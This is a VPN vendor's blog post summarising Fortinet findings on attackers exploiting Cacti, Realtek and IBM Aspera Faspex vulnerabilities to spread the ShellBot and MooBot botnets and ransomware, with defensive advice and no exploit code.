Several malicious actors are exploiting severe security weaknesses in Cacti, Realtek, and IBM Aspera Faspex to target unpatched systems. These exploits utilize CVE-2022-46169 (CVSS score: 9.8) and CVE-2021-35394 (CVSS score: 9.8) to deliver ShellBot (also known as PerlBot) and MooBot. This information comes from a report published by Fortinet FortiGuard Labs this week.
“CVE-2022-46169 is a command injection vulnerability that allows an unauthenticated user to execute arbitrary code on a server running Cacti. The vulnerability resides in the “remote_agent.php” file, which can be accessed without authentication.”
Malware analysis
- CVE-2022-46169 involves a significant authentication bypass and command injection flaw in Cacti servers, which allows unauthorized users to execute code of their choosing.
- CVE-2021-35394 is also an arbitrary command injection vulnerability that affects the Realtek Jungle SDK and was fixed in 2021.
Although CVE-2021-35394 has been previously exploited to disseminate botnets such as Mirai, Gafgyt, Mozi, and RedGoBot, this is the first instance where it has been used to deploy MooBot, a variant of Mirai that has been active since 2019.
Moobot to Shellcode
The Cacti flaw, besides being leveraged for MooBot attacks, has also been observed serving ShellBot payloads since January 2023, when the issue came to light.
At least three different versions of ShellBot have been detected:
- PowerBots (C) GohacK,
- LiGhT’s Modded perlbot v2, and
- B0tchZ 0.2a – the first two of which were recently disclosed by the AhnLab Security Emergency response Center (ASEC).
“Compromised victims can be controlled and used as DDoS bots after receiving a command from a C2 server,” Fortinet researcher.
“Because MooBot can kill other botnet processes and also deploy brute force attacks, administrators should use strong passwords and change them periodically.”
Active exploitation of IBM Aspera Faspex flaw
A crucial security vulnerability, CVE-2022-47986 (CVSS score: 9.8), which is a YAML deserialization flaw in IBM’s Aspera Faspex file exchange program, has been actively exploited. This is the third flaw to be targeted in this manner.
Since February, cybercriminals have been using the bug, which was fixed in December 2022 (version 4.4.2 Patch Level 2), in ransomware attacks connected with Buhti and IceFire. Following the release of a proof-of-concept (PoC) exploit, the flaw was quickly taken advantage of.
Earlier this week, cybersecurity firm Rapid7 stated that “one of its customers was breached via this vulnerability, necessitating swift application of the fixes to avoid potential risks.” Because this is typically a publicly accessible service and the flaw has been linked to ransomware group operations, the company advises that if a patch cannot be installed right away, the service should be taken offline.
Fortinet security for the exploitation
Shellcode and Moobot viruses are spread to exploitable servers. Fortinet has come up with a shield:
- Fortinet has released IPS signatures to proactively protect customers from the threats contained in the exploit list.
- The FortiGuard Web Filtering Service blocks the C2 server.
- FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.
Concluding thoughts
Do you think you are protected? No, it’s not the case. Vulnerabilities will keep on exploiting and you will always be prone to certain risks. The idea here is to stay protected with every effort you could make. But the most important thing is to be vigilant and know what’s happening!
PureVPN
April 4, 2023
1 year ago
